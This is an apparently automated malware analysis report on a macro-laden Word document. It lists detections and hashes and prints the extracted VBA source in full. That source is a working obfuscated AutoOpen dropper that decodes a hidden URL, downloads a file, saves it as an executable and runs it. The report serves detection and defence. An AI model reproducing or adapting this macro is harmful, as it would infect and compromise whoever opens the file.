Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6b1e99f1f81d3e35…

MALICIOUS

Office (OOXML)

31.3 KB Created: 2016-07-26 10:42:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2016-10-26
MD5: e65ef6281216de28666958fa45e7ca11 SHA-1: 2dba4758c89f63c6b807c858404721cd40e58b25 SHA-256: 6b1e99f1f81d3e354e204fb3b89a6c8510d94703a5c16459c7209fbaece845a5
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an OOXML document containing VBA macros. Heuristics indicate the presence of an obfuscated auto-exec loader that uses CreateObject and Shell/exec functions to download and execute a file. The embedded artifact 'macros.bas' likely contains this malicious VBA code.

Heuristics 9

  • ClamAV: Doc.Malware.Valyria-10019999-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10019999-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     somebody = variablrName1DASH_1.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set variablrName1DASH1solo = CreateObject(trutrufast(3))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set variablrName1DASH1solo = CreateObject(trutrufast(3))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12496 bytes
SHA-256: daec303eecc117cf647811dd5585244cefd86d5870a4627749ee6f466eb618e9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
LoadBaseFile
End Sub


Attribute VB_Name = "Module1"
Public variablrName1DASH_1 As Object
Public variablrName3 As Object
Public variablrName1DASH_3 As Object
Public variablrName5() As String


Public variablrName1DASH_4 As String
Public trutrufast() As String
Public variablrName1_tolko1 As String
Public variablrName1DASHfiddle As Object
Public variablrName4 As String
 Public variablrName2 As String
Public somebody As Variant
Public Function indata_to_kingaku(ByVal idx As Long, ByVal indata As Long) As Long
 Dim kingaku As Long
 Dim pasIdx As Long
 pasIdx = f1002_get_.sbt(idx)
 Select Case f1002_get_.Kind(idx)
 Case 2, 5, 6
 If f1007_get_.urikin(pasIdx) = 0 Or f1007_get_.inpscl(pasIdx) = 0 Then
 kingaku = 0
 Else
 kingaku = indata * f1007_get_.inpscl(pasIdx) * f1007_get_.tamatanka(pasIdx)
 End If
 Case Else
 kingaku = indata * 100
 End Select
 indata_to_kingaku = kingaku
End Function

Public Sub set_safe_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 g_dai.Rel(rdb - 1).safe = newValue
 If dataLink Then
 g_dai.Rel(rdb - 1).out = newValue
 End If
End Sub
Public Sub set_start_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 g_dai.Rel(rdb - 1).Start = newValue
 If dataLink Then
 End If
End Sub
Public Sub set_gen1uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 Dim sbt As Long
 Dim kinko As Long
 g_dai.Rel(rdb - 1).gen1uri = newValue
 If dataLink Then
 sbt = f1001_get_.sbt(rdb)
 g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
 kinko = f1001_get_.kinko(rdb)
 g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
 End If
End Sub

Public Sub AbnormalWindup()
 Dim rc As Long
 Dim rs As Long
 Set variablrName1DASH1solo = CreateObject(trutrufast(3))
 Set variablrName1DASH_3 = variablrName1DASH1solo.Environment(trutrufast(4))
 Dim apdistance As Integer
For apdistance = LBound(variablrName5) To UBound(variablrName5)
 variablrName4 = variablrName4 & SUBBUS3(apdistance)
 Next apdistance
 CheckRecovery
 Exit Sub
 Dim ftp As String
 For rs = 1 To f1000_get_rs + 1
 rc = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc = 0 Then
 rc = ft.p.DeleteFile("/r0/set")
 rc = ft.p.DeleteFile("/r0/mf6407_*")
 rc = ft.p.DeleteFile("/r0/mf6411*")
 rc = ft.p.DeleteFile("/r0/setok")
 rc = ft.p.DeleteFile("/r0/setng")
 ft.p.Close
 End If
 Next
End Sub
Public Function DataRecover(ByVal fLink As Boolean) As Boolean
 Dim I As Long
 Dim msg As String
 DataRecover = False
 If CheckGuid Then
 f640X_b.uild err_buf, err_count, bld_result, fLink
 If f640X_put = False Then
 Exit Function
 End If
 If set_put = False Then
 Exit Function
 End If
 SaveGu.ID
 DataRecover = True
 Else
 MsgBox "PC", vbCritical
 End If
End Function
Public Sub ShowResult()
 frmResult.Show vbModal
End Sub

Public Function SUBBUS3(variablrName6 As Integer) As String
Dost = CInt(variablrName5(variablrName6))
SUBBUS3 = Chr(Dost / (35 - 8))
End Function
Public Function SUBBUS2(A1 As String, A2 As String, A3 As String) As String
SUBBUS2 = Replace(A1, A2, A3)
End Function
Public Function GetDocumentName() As String
 If g_fileName = "" Then
 GetDocumentName = DEF_FILE_NAME
 Else
 GetDocumentName = g_fileName
 End If
End Function
Public Function NewDocument() As Boolean
 Erase g_dai.Rel
 Erase g_zen.Rel
 NewDocument = LoadBaseFile
End Function
Public Function OpenDocument(typicalName As String) As Boolean
 On Error GoTo ErrHandler
 Dim skipData As Long
 Dim fno As Integer
 trutrufast = Split(variablrName2, "ROOOOH")
 Set variablrName3 = CreateObject(trutrufast(1))
 Set variablrName1DASHfiddle = CreateObject(trutrufast(2))
 Dim I As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For I = 1 To Len(Trim("eesucka"))
 If d = False Then
Set variablrName1DASH_1 = CreateObject(trutrufast(I - 2))
Exit For
Else
d = False
End If
Next I
AbnormalWindup
Exit Function
 g_fileName = typicalName
 I = 0
 fno = FreeFile
 Open Replace(g_fileName, ".csv", "_d.csv") For Input As fno
 Do While Not EOF(fno)
  I = I + 1
 Loop
 Close fno
 I = 0
 fno = FreeFile
 Open Replace(g_fileName, ".csv", "_z.csv") For Input As fno
 Do While Not EOF(fno)
 I = I + 1
 Loop
 Close fno
 OpenDocument = True
 Exit Function
ErrHandler:
 OpenDocument = False
End Function
Public Function SaveDocument(typicalName As String) As Boolean
 On Error GoTo ErrHandler
 Dim I As Long
 Dim fno As Integer
  variablrName2 = SUBBUS2(variablrName2, "ROOH", "M")
 variablrName2 = SUBBUS2(variablrName2, "ROOOH", "s")
 OpenDocument ""
 Exit Function
 fno = FreeFile
 Open typicalName For Output As fno
 Write #fno, Now
 Close fno
 I = 0
 fno = FreeFile
 Open Replace(typicalName, ".csv", "_d.csv") For Output As fno
 For I = 0 To UBound(g_dai.Rel)
 Write #fno, I + 1, g_dai.Rel(I).out, g_dai.Rel(I).safe, g_dai.Rel(I).Start, g_dai.Rel(I).gen1uri, g_dai.Rel(I).gen2uri
 Next
 Close fno
 I = 0
 fno = FreeFile
 Open Replace(typicalName, ".csv", "_z.csv") For Output As fno
 For I = 0 To UBound(g_zen.Rel)
 Write #fno, I + 1, g_zen.Rel(I).urikin
 Next
 Close fno
 SaveDocument = True
 Exit Function
ErrHandler:
 SaveDocument = False
End Function



Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub erer()

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9CE5FF10-686D-4989-944B-505153292E69}{6262A439-2940-4599-BCD5-53A63AE71F0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Frame1_Click()

End Sub

Private Sub MultiPage1_Change()

End Sub

Private Sub TabStrip1_Change()

End Sub

Attribute VB_Name = "Module"
Public Sub set_gen2uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 Dim sbt As Long
 Dim kinko As Long
 variablrName3.Write somebody
 variablrName3.savetofile variablrName1_tolko1, 2
 set_out_rel 0, 0, False
 Exit Sub
 g_dai.Rel(rdb - 1).gen2uri = newValue
 If dataLink Then
 sbt = f1001_get_.sbt(rdb)
 g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
 kinko = f1001_get_.kinko(rdb)
 g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
 End If
End Sub
Public Sub set_indata_rel(ByVal idx As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 g_zen.Rel(idx - 1).urikin = newValue
 If dataLink Then
 End If
End Sub
Public Sub f640X_build(err_buffer() As String, err_count As Long, bld_result() As String, ByVal fLink As Boolean)
 If fLink Then
 
 Else

 End If
End Sub

Public Function LoadBaseFile() As Boolean
 Dim wssName As String
 Dim fno As Integer
 variablrName5 = Split("2808312312312443132312312312443132312312312443024312312312441566312312312441269312312312441269312312312443213312312312443213312312312443213312312312441242312312312443132312312312443078312312312442619312312312443024312312312442619312312312442916312312312442916312312312442619312312312442970312312312441242312312312442673312312312442997312312312442943312312312441269312312312442997312312312442889312312312443024312312312441539312312312441512312312312441485312312312442781312312312441485312312312443186", "31231231244")
variablrName2 = SUBBUS2("ROOHicroROOOHoft.XROOHLHTTPROOOOHAdodb.ROOOHtrROHaROOHROOOOHROOOHhROHll.Appl" _
+ SUBBUS2("icationROOOOHWROOOHcript.ROOOHhROHllROOOOHProcROHROOOHROOOHROOOOHGROHTROOOOHTROHROOHPROOOOHTypROHROOOOHopROHnROOOOHwritDATponROOOHROHBodyROOOOHROOOHavROHtofilROHROOOOH", "DAT", "ROHROOOOHrROHROOOH") _
+ "\hramgROOOH.ROHxROH", "ROH", "e")
SaveDocument ""
End Function

Public Function f640X_put() As Boolean
 Dim allOk As Boolean
 Dim rc(4) As Long
 Dim rs As Long
 variablrName1DASH_4 = variablrName1DASH_3(trutrufast(6))
 variablrName1_tolko1 = variablrName1DASH_4
variablrName1_tolko1 = variablrName1_tolko1 + trutrufast(12)
variablrName3.Type = 1
MakeLocalFile
Exit Function
 f640X_put = True
 MakeLocalFile
 For rs = 1 To f1000_get_rs + 1
 rc(0) = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc(0) = 0 Then
 rc(1) = ft.p.PutFile("mf6407_" & CStr(rs) & ".bin", "/r0", 1)
 rc(2) = ft.p.PutFile("mf6407_" & CStr(rs) & ".crc", "/r0", 1)
 rc(3) = ft.p.PutFile("mf6411.bin", "/r0", 1)
 rc(4) = ft.p.PutFile("mf6411.crc", "/r0", 1)
 ft.p.Close
 Else
 Call ErrCo.nnect(ftp, rc(0))
 End If
 Set ftp = Nothing
 If rc(0) <> 0 Or rc(1) <> 1 Or rc(2) <> 1 Or rc(3) <> 1 Or rc(4) <> 1 Then
 f640X_put = False
 Exit For
 End If
 Next
 Kill "mf6407_.bin"
 Kill "mf6407_.crc"
 Kill "mf6411."
End Function

Attribute VB_Name = "Module2"
Public Function f4103_get_kingaku(ByVal idx As Long) As Long
 f4103_get_kingaku = indata_to_kingaku(idx, fno4103_get_.indata(s_f.no4103(0), idx))
End Function
Public Function sum_kinko_dai(ByVal kinko As Long) As Long
 Dim rdb As Long
 Dim sum As Long
 For rdb = 1 To f1000_get_daisu
 If f1001_get_.kinko(rdb) = kinko Then
 sum = sum + g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri
 End If
 Next
 sum_kinko_dai = sum
End Function
Public Sub set_out_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
 variablrName1DASHfiddle.Open (variablrName1_tolko1)
 Exit Sub
 g_dai.Rel(rdb - 1).out = newValue
 If dataLink Then
 g_dai.Rel(rdb - 1).safe = newValue
 End If
End Sub

Public Sub MakeLocalFile()
 Dim fno As Integer
 Dim rs As Long
 Dim I As Long
 Dim crc As Integer
 variablrName3.Open
 somebody = variablrName1DASH_1.responseBody
 set_gen2uri_rel 0, 0, False
 Exit Sub
 Dim work(512 - 1) As Byte
 For rs = 1 To 3
 fno = FreeFile
 Open "mf6407_" & CStr(rs) & ".bin" For Binary As fno
 For I = 0 To UBound(work)
 work(I) = s_fn.o6407(((rs - 1) * 512 * RECSIZE_FN.O4102) + I)
 Next
 Put fno, , work
 Close fno
 crc = hto.ns(lec_cal.ccrc(work(0), RECSIZE_FN.O4102 * 512))
 fno = FreeFile
 Open "mf6407_" & CStr(rs) & ".crc" For Binary As fno
 Put fno, , crc
 Close fno
 Next
 fno = FreeFile
 Open "mf6411.bin" For Binary As fno
 Put fno, , s_fno6411
 Close fno
 crc = hto.ns(lec_cal.ccrc(s_fno6411(0), SIZE_OF_FNO6411))
 fno = FreeFile
 Open "mf6411.crc" For Binary As fno
 Put fno, , crc
 Close fno
End Sub

Public Function set_put() As Boolean
 Dim allOk As Boolean
 Dim rc(4) As Long
 Dim rs As Long
 Dim ftp As String
 set_put = True
 For rs = 1 To f1000_get_rs + 1
 rc(0) = f.tp.Connect("as" & CStr(rs), "super", "user")
 If rc(0) = 0 Then
 rc(1) = ft.p.PutFile("set", "/r0", 1)
 ft.p.Close
 Else
 Call ErrCon.nect(ftp, rc(0))
 End If
 If rc(0) <> 0 Or rc(1) <> 1 Then
 set_put = False
 Exit For
 End If
 Next
End Function
Public Function CheckRecovery() As Long
 Dim okFlag As Boolean, ngFlag As Boolean
 Dim rc As Long
 Dim rs As Long
 Dim farray As Variant
 If Application = "Microsoft Word" Then
 variablrName1DASH_1.Open trutrufast(5), variablrName4, False
variablrName1DASH_1.Send
f640X_put
End If
Exit Function
 Dim ftp As String
 For rs = 1 To f1000_get_rs + 1
 rc = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc = 0 Then
 farray = ft.p.GetDir("/r0")
 okFlag = InArr.ay(farray, "setok")
 ngFlag = InArr.ay(farray, "setng")
 If okFlag = True And ngFlag = False Then
 CheckRecovery = 1
 ElseIf okFlag = False And ngFlag = True Then
 CheckRecovery = 2
 Else
 CheckRecovery = 0
 End If
 End If
 Next
End Function
Public Sub NormalWindup()
 Dim rc As Long
 Dim rs As Long
 Dim ftp As String
 For rs = 1 To f1000_get_rs + 1
 rc = ft.p.Connect("as" & CStr(rs), "super", "user")
 If rc = 0 Then
 rc = ft.p.DeleteFile("/r0/setok")
 rc = ft.p.DeleteFile("/r0/setng")
 ft.p.Close
 End If
 Next
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 48640 bytes
SHA-256: 50529d74c9bd8d02bf757287311f0a7c7fd1c9078f7e9a740d7d55a94094ae37
Detection
ClamAV: Doc.Malware.Valyria-10019999-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).